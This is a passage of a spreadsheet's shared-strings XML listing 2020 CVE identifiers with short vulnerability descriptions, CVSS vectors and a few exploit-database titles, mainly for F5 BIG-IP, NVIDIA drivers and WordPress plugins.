  <si>
    <t>BIG-IP 15.0.0 &lt; 15.1.0.3 / 14.1.0 &lt; 14.1.2.5 / 13.1.0 &lt; 13.1.3.3 / 12.1.0 &lt; 12.1.5.1 / 11.6.1 &lt; 11.6.5.1 - Traffic Management User Interface 'TMUI'  Remote Code Execution (PoC)</t>
  </si>
  <si>
    <t>2020-07-05</t>
  </si>
  <si>
    <t>CVE-2020-5903</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, a Cross-Site Scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility.</t>
  </si>
  <si>
    <t>CVE-2020-5904</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, a cross-site request forgery (CSRF) vulnerability in the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, exists in an undisclosed page.</t>
  </si>
  <si>
    <t>CVE-2020-5905</t>
  </si>
  <si>
    <t>In version 11.6.1-11.6.5.2 of the BIG-IP system Configuration utility Network &gt; WCCP page, the system does not sanitize all user-provided data before display.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-5906</t>
  </si>
  <si>
    <t>In versions 13.1.0-13.1.3.3, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, the BIG-IP system does not properly enforce the access controls for the scp.blacklist files. This allows Admin and Resource Admin users with Secure Copy (SCP) protocol access to read and overwrite blacklisted files via SCP.</t>
  </si>
  <si>
    <t>CVE-2020-5907</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, an authorized user provided with access only to the TMOS Shell (tmsh) may be able to conduct arbitrary file read/writes via the built-in sftp functionality.</t>
  </si>
  <si>
    <t>CVE-2020-5908</t>
  </si>
  <si>
    <t>In versions bundled with BIG-IP APM 12.1.0-12.1.5 and 11.6.1-11.6.5.2, Edge Client for Linux exposes full session ID in the local log files.</t>
  </si>
  <si>
    <t>CVE-2020-5909</t>
  </si>
  <si>
    <t>In versions 3.0.0-3.5.0, 2.0.0-2.9.0, and 1.0.1, when users run the command displayed in NGINX Controller user interface (UI) to fetch the agent installer, the server TLS certificate is not verified.</t>
  </si>
  <si>
    <t>CVE-2020-5910</t>
  </si>
  <si>
    <t>In versions 3.0.0-3.5.0, 2.0.0-2.9.0, and 1.0.1, the Neural Autonomic Transport System (NATS) messaging services in use by the NGINX Controller do not require any form of authentication, so any successful connection would be authorized.</t>
  </si>
  <si>
    <t>CVE-2020-5911</t>
  </si>
  <si>
    <t>In versions 3.0.0-3.5.0, 2.0.0-2.9.0, and 1.0.1, the NGINX Controller installer starts the download of Kubernetes packages from an HTTP URL On Debian/Ubuntu system.</t>
  </si>
  <si>
    <t>CVE-2020-5912</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the restjavad process's dump command does not follow current best coding practices and may overwrite arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-5913</t>
  </si>
  <si>
    <t>In versions 15.0.0-15.1.0.1, 14.1.0-14.1.2.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.2, the BIG-IP Client or Server SSL profile ignores revoked certificates, even when a valid CRL is present. This impacts SSL/TLS connections and may result in a man-in-the-middle attack on the connections.</t>
  </si>
  <si>
    <t>CVE-2020-5914</t>
  </si>
  <si>
    <t>In BIG-IP ASM versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, undisclosed server cookie scenario may cause BD to restart under some circumstances.</t>
  </si>
  <si>
    <t>CVE-2020-5915</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, an undisclosed TMUI page contains a vulnerability which allows a stored XSS when BIG-IP systems are setup in a device trust.</t>
  </si>
  <si>
    <t>CVE-2020-5916</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.1.0-15.1.0.4 and 15.0.0-15.0.1.3 the Certificate Administrator user role and higher privileged roles can perform arbitrary file reads outside of the web root directory.</t>
  </si>
  <si>
    <t>CVE-2020-5917</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.2 and BIG-IQ versions 5.2.0-7.0.0, the host OpenSSH servers utilize keys of less than 2048 bits which are no longer considered secure.</t>
  </si>
  <si>
    <t>CVE-2020-5918</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.3, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management Microkernel (TMM) may stop responding when processing Stream Control Transmission Protocol (SCTP) traffic when traffic volume is high. This vulnerability affects TMM by way of a virtual server configured with an SCTP profile.</t>
  </si>
  <si>
    <t>CVE-2020-5919</t>
  </si>
  <si>
    <t>In versions 15.1.0-15.1.0.4, rendering of certain session variables by BIG-IP APM UI-based agents in an access profile configured with Modern customization, may cause the Traffic Management Microkernel (TMM) to stop responding.</t>
  </si>
  <si>
    <t>CVE-2020-5920</t>
  </si>
  <si>
    <t>In versions 15.0.0-15.1.0.5, 14.1.0-14.1.2.7, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, a vulnerability in the BIG-IP AFM Configuration utility may allow any authenticated BIG-IP user to perform a read-only blind SQL injection attack.</t>
  </si>
  <si>
    <t>CVE-2020-5921</t>
  </si>
  <si>
    <t>in BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.6, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.2, Syn flood causes large number of MCPD context messages destined to secondary blades consuming memory leading to MCPD failure. This issue affects only VIPRION hosts with two or more blades installed. Single-blade VIPRION hosts are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-5922</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.0.0-15.1.0.4, 14.1.0-14.1.2.6, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.2, iControl REST does not implement Cross Site Request Forgery protections for users which make use of Basic Authentication in a web browser.</t>
  </si>
  <si>
    <t>CVE-2020-5923</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.0.0-15.1.0.4, 14.1.0-14.1.2.6, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1 and BIG-IQ versions 5.4.0-7.0.0, Self-IP port-lockdown bypass via IPv6 link-local addresses.</t>
  </si>
  <si>
    <t>CVE-2020-5924</t>
  </si>
  <si>
    <t>In BIG-IP APM versions 12.1.0-12.1.5.1 and 11.6.1-11.6.5.2, RADIUS authentication leaks memory when the username for authentication is not set.</t>
  </si>
  <si>
    <t>CVE-2020-5925</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.6, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, undisclosed internally generated UDP traffic may cause the Traffic Management Microkernel (TMM) to restart under some circumstances.</t>
  </si>
  <si>
    <t>CVE-2020-5926</t>
  </si>
  <si>
    <t>In BIG-IP versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, and 14.1.0-14.1.2.6, a BIG-IP virtual server with a Session Initiation Protocol (SIP) ALG profile, parsing SIP messages that contain a multi-part MIME payload with certain boundary strings can cause TMM to free memory to the wrong cache.</t>
  </si>
  <si>
    <t>CVE-2020-5927</t>
  </si>
  <si>
    <t>In versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, and 14.1.0-14.1.2.6, BIG-IP ASM Configuration utility Stored-Cross Site Scripting.</t>
  </si>
  <si>
    <t>CVE-2020-5928</t>
  </si>
  <si>
    <t>In versions 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.2.6, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, BIG-IP ASM Configuration utility CSRF protection token can be reused multiple times.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-5929</t>
  </si>
  <si>
    <t>In versions 13.0.0-13.0.0 HF2, 12.1.0-12.1.2 HF1, and 11.6.1-11.6.2, BIG-IP platforms with Cavium Nitrox SSL hardware acceleration cards, a Virtual Server configured with a Client SSL profile, and using Anonymous (ADH) or Ephemeral (DHE) Diffie-Hellman key exchange and Single DH use option not enabled in the options list may be vulnerable to crafted SSL/TLS Handshakes that may result with a PMS (Pre-Master Secret) that starts in a 0 byte and may lead to a recovery of plaintext messages as BIG-IP TLS/SSL ADH/DHE sends different error messages acting as an oracle. Similar error messages when PMS starts with 0 byte coupled with very precise timing measurement observation may also expose this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-5930</t>
  </si>
  <si>
    <t>In BIG-IP 15.0.0-15.1.0.4, 14.1.0-14.1.2.7, 13.1.0-13.1.3.3, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2 and BIG-IQ 5.2.0-7.1.0, unauthenticated attackers can cause disruption of service via undisclosed methods.</t>
  </si>
  <si>
    <t>CVE-2020-5931</t>
  </si>
  <si>
    <t>On BIG-IP 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, Virtual servers with a OneConnect profile may incorrectly handle WebSockets related HTTP response headers, causing TMM to restart.</t>
  </si>
  <si>
    <t>CVE-2020-5932</t>
  </si>
  <si>
    <t>On BIG-IP ASM 15.1.0-15.1.0.5, a cross-site scripting (XSS) vulnerability exists in the BIG-IP ASM Configuration utility response and blocking pages. An authenticated user with administrative privileges can specify a response page with any content, including JavaScript code that will be executed when preview is opened.</t>
  </si>
  <si>
    <t>CVE-2020-5933</t>
  </si>
  <si>
    <t>On versions 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, when a BIG-IP system that has a virtual server configured with an HTTP compression profile processes compressed HTTP message payloads that require deflation, a Slowloris-style attack can trigger an out-of-memory condition on the BIG-IP system.</t>
  </si>
  <si>
    <t>CVE-2020-5934</t>
  </si>
  <si>
    <t>On BIG-IP APM 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, and 13.1.0-13.1.3.3, when multiple HTTP requests from the same client to configured SAML Single Logout (SLO) URL are passing through a TCP Keep-Alive connection, traffic to TMM can be disrupted.</t>
  </si>
  <si>
    <t>CVE-2020-5935</t>
  </si>
  <si>
    <t>On BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) versions 15.1.0-15.1.0.5, 14.1.0-14.1.2.3, and 13.1.0-13.1.3.3, when handling MQTT traffic through a BIG-IP virtual server associated with an MQTT profile and an iRule performing manipulations on that traffic, TMM may produce a core file.</t>
  </si>
  <si>
    <t>CVE-2020-5936</t>
  </si>
  <si>
    <t>On BIG-IP LTM 15.1.0-15.1.0.5, 14.1.0-14.1.2.7, 13.1.0-13.1.3.4, and 12.1.0-12.1.5.1, the Traffic Management Microkernel (TMM) process may consume excessive resources when processing SSL traffic and client authentication are enabled on the client SSL profile.</t>
  </si>
  <si>
    <t>CVE-2020-5937</t>
  </si>
  <si>
    <t>On BIG-IP AFM 15.1.0-15.1.0.5, the Traffic Management Microkernel (TMM) may produce a core file while processing layer 4 (L4) behavioral denial-of-service (DoS) traffic.</t>
  </si>
  <si>
    <t>CVE-2020-5938</t>
  </si>
  <si>
    <t>On BIG-IP 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, when negotiating IPSec tunnels with configured, authenticated peers, the peer may negotiate a different key length than the BIG-IP configuration would otherwise allow.</t>
  </si>
  <si>
    <t>CVE-2020-5939</t>
  </si>
  <si>
    <t>In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.3, 15.0.0-15.0.1.3, 14.1.0-14.1.2.6, and 13.1.0-13.1.3.4, BIG-IP Virtual Edition (VE) systems on VMware, with an Intel-based 85299 Network Interface Controller (NIC) card and Single Root I/O Virtualization (SR-IOV) enabled on vSphere, may fail and leave the Traffic Management Microkernel (TMM) in a state where it cannot transmit traffic.</t>
  </si>
  <si>
    <t>CVE-2020-5940</t>
  </si>
  <si>
    <t>In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.2.3, a stored cross-site scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Traffic Management User Interface (TMUI), also known as the BIG-IP Configuration utility.</t>
  </si>
  <si>
    <t>CVE-2020-5941</t>
  </si>
  <si>
    <t>On BIG-IP versions 16.0.0-16.0.0.1 and 15.1.0-15.1.0.5, using the RESOLV::lookup command within an iRule may cause the Traffic Management Microkernel (TMM) to generate a core file and restart. This issue occurs when data exceeding the maximum limit of a hostname passes to the RESOLV::lookup command.</t>
  </si>
  <si>
    <t>CVE-2020-5942</t>
  </si>
  <si>
    <t>In BIG-IP PEM versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.2.7, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, when processing Capabilities-Exchange-Answer (CEA) packets with certain attributes from the Policy and Charging Rules Function (PCRF) server, the Traffic Management Microkernel (TMM) may generate a core file and restart.</t>
  </si>
  <si>
    <t>CVE-2020-5943</t>
  </si>
  <si>
    <t>In versions 14.1.0-14.1.0.1 and 14.1.2.5-14.1.2.7, when a BIG-IP object is created or listed through the REST interface, the protected fields are obfuscated in the REST response, not protected via a SecureVault cryptogram as TMSH does. One example of protected fields is the GTM monitor password.</t>
  </si>
  <si>
    <t>CVE-2020-5944</t>
  </si>
  <si>
    <t>In BIG-IQ 7.1.0, accessing the DoS Summary events and DNS Overview pages in the BIG-IQ system interface returns an error message due to disabled Grafana reverse proxy in web service configuration. F5 has done further review of this vulnerability and has re-classified it as a defect. CVE-2020-5944 will continue to be referenced in F5 Security Advisory K57274211 and will not be assigned to other F5 vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-5945</t>
  </si>
  <si>
    <t>In BIG-IP versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.2.7, undisclosed TMUI page contains a stored cross site scripting vulnerability (XSS). The issue allows a minor privilege escalation for resource admin to escalate to full admin.</t>
  </si>
  <si>
    <t>CVE-2020-5946</t>
  </si>
  <si>
    <t>In BIG-IP Advanced WAF and FPS versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.2.7, under some circumstances, certain format client-side alerts sent to the BIG-IP virtual server configured with DataSafe may cause the Traffic Management Microkernel (TMM) to restart, resulting in a Denial-of-Service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-5947</t>
  </si>
  <si>
    <t>In versions 16.0.0-16.0.0.1 and 15.1.0-15.1.1, on specific BIG-IP platforms, attackers may be able to obtain TCP sequence numbers from the BIG-IP system that can be reused in future connections with the same source and destination port and IP numbers. Only these platforms are affected: BIG-IP 2000 series (C112), BIG-IP 4000 series (C113), BIG-IP i2000 series (C117), BIG-IP i4000 series (C115), BIG-IP Virtual Edition (VE).</t>
  </si>
  <si>
    <t>CVE-2020-5948</t>
  </si>
  <si>
    <t>On BIG-IP versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.2.7, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, undisclosed endpoints in iControl REST allow for a reflected XSS attack, which could lead to a complete compromise of the BIG-IP system if the victim user is granted the admin role.</t>
  </si>
  <si>
    <t>CVE-2020-5949</t>
  </si>
  <si>
    <t>On BIG-IP versions 14.0.0-14.0.1 and 13.1.0-13.1.3.4, certain traffic pattern sent to a virtual server configured with an FTP profile can cause the FTP channel to break.</t>
  </si>
  <si>
    <t>CVE-2020-5950</t>
  </si>
  <si>
    <t>On BIG-IP 14.1.0-14.1.2.6, undisclosed endpoints in iControl REST allow for a reflected XSS attack, which could lead to a complete compromise of the BIG-IP system if the victim user is granted the admin role.</t>
  </si>
  <si>
    <t>CVE-2020-5953</t>
  </si>
  <si>
    <t>A vulnerability exists in System Management Interrupt (SWSMI) handler of InsydeH2O UEFI Firmware code located in SWSMI handler that dereferences gRT (EFI_RUNTIME_SERVICES) pointer to call a GetVariable service, which is located outside of SMRAM. This can result in code execution in SMM (escalating privilege from ring 0 to ring -2).</t>
  </si>
  <si>
    <t>CVE-2020-5955</t>
  </si>
  <si>
    <t>An issue was discovered in Int15MicrocodeSmm in Insyde InsydeH2O before 2021-10-14 on Intel client chipsets. A caller may be able to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5956</t>
  </si>
  <si>
    <t>An issue was discovered in SdLegacySmm in Insyde InsydeH2O with kernel 5.1 before 05.15.11, 5.2 before 05.25.11, 5.3 before 05.34.11, and 5.4 before 05.42.11. The software SMI handler allows untrusted external input because it does not verify CommBuffer.</t>
  </si>
  <si>
    <t>CVE-2020-5957</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the NVIDIA Control Panel component in which an attacker with local system access can corrupt a system file, which may lead to denial of service or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5958</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the NVIDIA Control Panel component in which an attacker with local system access can plant a malicious DLL file, which may lead to code execution, denial of service, or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5959</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager, all versions, contains a vulnerability in the vGPU plugin in which an input index value is incorrectly validated which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5960</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the kernel module (nvidia.ko), where a null pointer dereference may occur, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5961</t>
  </si>
  <si>
    <t>NVIDIA vGPU graphics driver for guest OS contains a vulnerability in which an incorrect resource clean up on a failure path can impact the guest VM, leading to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5962</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the NVIDIA Control Panel component, in which an attacker with local system access can corrupt a system file, which may lead to denial of service or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5963</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the Inter Process Communication APIs, in which improper access control may lead to code execution, denial of service, or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5964</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the service host component, in which the application resources integrity check may be missed. Such an attack may lead to code execution, denial of service or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5965</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the DirectX 11 user mode driver (nvwgf2um/x.dll), in which a specially crafted shader can cause an out of bounds access, leading to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5966</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, in which a NULL pointer is dereferenced, leading to denial of service or potential escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5967</t>
  </si>
  <si>
    <t>NVIDIA Linux GPU Display Driver, all versions, contains a vulnerability in the UVM driver, in which a race condition may lead to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5968</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which the software does not restrict or incorrectly restricts operations within the boundaries of a resource that is accessed by using an index or pointer, such as memory or files, which may lead to code execution, denial of service, escalation of privileges, or information disclosure. This affects vGPU version 8.x (prior to 8.4), version 9.x (prior to 9.4) and version 10.x (prior to 10.3).</t>
  </si>
  <si>
    <t>CVE-2020-5969</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which it validates a shared resource before using it, creating a race condition which may lead to denial of service or information disclosure. This affects vGPU version 8.x (prior to 8.4), version 9.x (prior to 9.4) and version 10.x (prior to 10.3).</t>
  </si>
  <si>
    <t>CVE-2020-5970</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which an input data size is not validated, which may lead to tampering or denial of service. This affects vGPU version 8.x (prior to 8.4), version 9.x (prior to 9.4) and version 10.x (prior to 10.3).</t>
  </si>
  <si>
    <t>CVE-2020-5971</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which the software reads from a buffer by using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer, which may lead to code execution, denial of service, escalation of privileges, or information disclosure. This affects vGPU version 8.x (prior to 8.4), version 9.x (prior to 9.4) and version 10.x (prior to 10.3).</t>
  </si>
  <si>
    <t>CVE-2020-5972</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which local pointer variables are not initialized and may be freed later, which may lead to tampering or denial of service. This affects vGPU version 8.x (prior to 8.4), version 9.x (prior to 9.4) and version 10.x (prior to 10.3).</t>
  </si>
  <si>
    <t>CVE-2020-5973</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager and the guest drivers contain a vulnerability in vGPU plugin, in which there is the potential to execute privileged operations, which may lead to denial of service. This affects vGPU version 8.x (prior to 8.4), version 9.x (prior to 9.4) and version 10.x (prior to 10.3).</t>
  </si>
  <si>
    <t>CVE-2020-5974</t>
  </si>
  <si>
    <t>NVIDIA JetPack SDK, version 4.2 and 4.3, contains a vulnerability in its installation scripts in which permissions are incorrectly set on certain directories, which can lead to escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5975</t>
  </si>
  <si>
    <t>NVIDIA GeForce NOW, versions prior to 2.0.23 on Windows and macOS, contains a vulnerability in the desktop application software that includes sensitive information as part of a URL, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5976</t>
  </si>
  <si>
    <t>NVIDIA GeForce NOW, versions prior to 2.0.23 (Windows, macOS) and versions prior to 5.31 (Android, Shield TV), contains a vulnerability in the application software where the network test component transmits sensitive information insecurely, which may lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5977</t>
  </si>
  <si>
    <t>NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in NVIDIA Web Helper NodeJS Web Server in which an uncontrolled search path is used to load a node module, which may lead to code execution, denial of service, escalation of privileges, and information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5978</t>
  </si>
  <si>
    <t>NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in its services in which a folder is created by nvcontainer.exe under normal user login with LOCAL_SYSTEM privileges which may lead to a denial of service or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5979</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the NVIDIA Control Panel component in which a user is presented with a dialog box for input by a high-privilege process, which may lead to escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5980</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in multiple components in which a securely loaded system DLL will load its dependencies in an insecure fashion, which may lead to code execution or denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5981</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the DirectX11 user mode driver (nvwgf2um/x.dll), in which a specially crafted shader can cause an out of bounds access, which may lead to denial of service or code execution.</t>
  </si>
  <si>
    <t>CVE-2020-5982</t>
  </si>
  <si>
    <t>NVIDIA Windows GPU Display Driver, all versions, contains a vulnerability in the kernel mode layer (nvlddmkm.sys) scheduler, in which the software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests, which may lead to denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-5983</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin and the host driver kernel module, in which the potential exists to write to a memory location that is outside the intended boundary of the frame buffer memory allocated to guest operating systems, which may lead to denial of service or information disclosure. This affects vGPU version 8.x (prior to 8.5), version 10.x (prior to 10.4) and version 11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5984</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin in which it may have the use-after-free vulnerability while freeing some resources, which may lead to denial of service, code execution, and information disclosure. This affects vGPU version 8.x (prior to 8.5), version 10.x (prior to 10.4) and version 11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5985</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which an input data length is not validated, which may lead to tampering or denial of service. This affects vGPU version 8.x (prior to 8.5), version 10.x (prior to 10.4) and version 11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5986</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which an input data size is not validated, which may lead to tampering or denial of service. This affects vGPU version 8.x (prior to 8.5), version 10.x (prior to 10.4) and version 11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5987</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin in which guest-supplied parameters remain writable by the guest after the plugin has validated them, which may lead to the guest being able to pass invalid parameters to plugin handlers, which may lead to denial of service or escalation of privileges. This affects vGPU version 8.x (prior to 8.5), version 10.x (prior to 10.4) and version 11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5988</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which allocated memory can be freed twice, which may lead to information disclosure or denial of service. This affects vGPU version 8.x (prior to 8.5), version 10.x (prior to 10.4) and version 11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5989</t>
  </si>
  <si>
    <t>NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, in which it can dereference a NULL pointer, which may lead to denial of service. This affects vGPU version 8.x (prior to 8.5), version 10.x (prior to 10.4) and version 11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5990</t>
  </si>
  <si>
    <t>NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in the ShadowPlay component which may lead to local privilege escalation, code execution, denial of service or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5991</t>
  </si>
  <si>
    <t>NVIDIA CUDA Toolkit, all versions prior to 11.1.1, contains a vulnerability in the NVJPEG library in which an out-of-bounds read or write operation may lead to code execution, denial of service, or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-5992</t>
  </si>
  <si>
    <t>NVIDIA GeForce NOW application software on Windows, all versions prior to 2.0.25.119, contains a vulnerability in its open-source software dependency in which the OpenSSL library is vulnerable to binary planting attacks by a local user, which may lead to code execution or escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-6007</t>
  </si>
  <si>
    <t>Philips Hue Bridge model 2.X prior to and including version 1935144020 contains a Heap-based Buffer Overflow when handling a long ZCL string during the commissioning phase, resulting in a remote code execution.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H</t>
  </si>
  <si>
    <t>CVE-2020-6008</t>
  </si>
  <si>
    <t>LifterLMS Wordpress plugin version below 3.37.15 is vulnerable to arbitrary file write leading to remote code execution</t>
  </si>
  <si>
    <t>CVE-2020-6009</t>
  </si>
  <si>
    <t>LearnDash Wordpress plugin version below 3.1.6 is vulnerable to Unauthenticated SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-6010</t>
  </si>
  <si>
    <t>LearnPress Wordpress plugin version prior and including 3.2.6.7 is vulnerable to SQL Injection</t>
  </si>
  <si>
    <t>exploits/php/webapps/50137.txt</t>
  </si>
  <si>
    <t>WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)</t>
  </si>
  <si>
    <t>2021-07-19</t>
  </si>
  <si>
    <t>CVE-2020-6012</t>
  </si>
  <si>
    <t>ZoneAlarm Anti-Ransomware before version 1.0.713 copies files for the report from a directory with low privileges. A sophisticated timed attacker can replace those files with malicious or linked content, such as exploiting CVE-2020-0896 on unpatched systems or using symbolic links. This allows an unprivileged user to enable escalation of privilege via local access.</t>
  </si>
  <si>
    <t>CVE-2020-6013</t>
  </si>
  <si>
